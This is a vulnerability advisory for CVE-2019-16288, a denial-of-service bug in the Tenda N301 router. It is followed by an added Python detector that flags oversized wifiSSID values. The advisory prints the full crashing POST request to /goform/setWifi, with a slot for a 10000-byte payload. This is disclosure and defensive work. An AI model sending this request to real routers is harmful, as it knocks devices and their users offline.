CVE-2019-16288

a guest
Sep 13th, 2019
CVE-2019-16288

> [Description]
> On Tenda N301 wireless routers, a long string in the wifiSSID
> parameter of a goform/setWifi POST request causes the device to crash.
>
> ------------------------------------------
>
> [Additional Information]
> Injecting a 10000-byte payload results in denial of service
>
> ------------------------------------------
>
> [VulnerabilityType Other]
> denial of service (total hardware crash!)
>
> ------------------------------------------
>
> [Vendor of Product]
> https://www.tendacn.com/
>
> ------------------------------------------
>
> [Affected Product Code Base]
> Tenda Wireless router - N301
>
> ------------------------------------------
>
> [Affected Component]
> POST /goform/setWifi HTTP/1.1
> "wifiSSID="
>
> ------------------------------------------
>
> [Attack Type]
> Remote
>
> ------------------------------------------
>
> [Impact Denial of Service]
> true
>
> ------------------------------------------
>
> [Attack Vectors]

POST /goform/setWifi HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
Accept: */*
Accept-Language: hu-HU,hu;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded;
Content-Length: 423
Connection: close
Referer: http://192.168.0.1/index.html
Cookie: ecos_pw=MDEyMzQ1Njc41qw:language=cn; bLanguage=en

module1=wifiEn&wifiEn=true&module2=wifiBasicCfg&wifiSSID=[10000Byte_Payload here!]&wifiSecurityMode=none&wifiPwd=&wifiHideSSID=false&module7=wifiVirSsid&multiWifiEnable=0&multiWifiSSID=Tenda_Extender&multiWifiPwd=12345678&module3=wifiTime&wifiTimeEn=false&wifiTimeClose=00%3A00-07%3A00&wifiTimeDate=01111100&module4=wifiWPS&wpsEn=false&module5=wifiAdvCfg&wifiMode=bgn&wifiChannel=auto&wifiBandwidth=auto&module6=wifiPower&wifiPower=high
> ------------------------------------------
>
> [Reference]
> https://www.tendacn.com
 
Use CVE-2019-16288.
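
A detection-side check for the request shape described above, added here as an example and not part of the original paste or any vendor code: it parses a raw HTTP request and flags a wifiSSID value on POST /goform/setWifi that exceeds the 32-octet SSID limit of IEEE 802.11. The function names `inspect_request` and `sample_request` are hypothetical, and the sample requests are constructed.

```python
from urllib.parse import parse_qsl, urlsplit

MAX_SSID_OCTETS = 32            # IEEE 802.11 caps an SSID at 32 octets
TARGET_PATH = "/goform/setWifi" # endpoint named in the advisory
PARAM = "wifiSSID"              # parameter named in the advisory


def inspect_request(raw: bytes) -> list:
    """Return findings for one raw HTTP request (empty list if nothing to flag)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    request_line = head.split(b"\r\n")[0].decode("latin-1")
    try:
        method, target, _version = request_line.split(" ", 2)
    except ValueError:
        return ["malformed request line"]
    # Only the settings endpoint from the advisory is of interest here.
    if method.upper() != "POST" or urlsplit(target).path != TARGET_PATH:
        return []
    findings = []
    # Decode the form body as latin-1 so one character equals one octet, and
    # measure after percent-decoding: that is the length the device would store.
    pairs = parse_qsl(body.decode("latin-1"), keep_blank_values=True,
                      encoding="latin-1")
    for name, value in pairs:   # a repeated parameter is checked every time
        if name == PARAM:
            octets = len(value.encode("latin-1"))
            if octets > MAX_SSID_OCTETS:
                findings.append(
                    f"{PARAM} is {octets} octets (limit {MAX_SSID_OCTETS})")
    return findings


def sample_request(ssid: str) -> bytes:
    """Constructed request modelled on the one in the paste (shortened body)."""
    body = ("module1=wifiEn&wifiEn=true&module2=wifiBasicCfg"
            f"&wifiSSID={ssid}&wifiSecurityMode=none")
    head = ("POST /goform/setWifi HTTP/1.1\r\n"
            "Host: 192.168.0.1\r\n"
            "Content-Type: application/x-www-form-urlencoded\r\n"
            f"Content-Length: {len(body)}\r\n\r\n")
    return (head + body).encode("latin-1")


if __name__ == "__main__":
    for ssid in ("Tenda_Home", "A" * 10000, "%41" * 33):
        print(len(ssid), inspect_request(sample_request(ssid)))
```

The same length test can be placed in a reverse proxy or IDS rule in front of the management interface when the firmware itself cannot be updated.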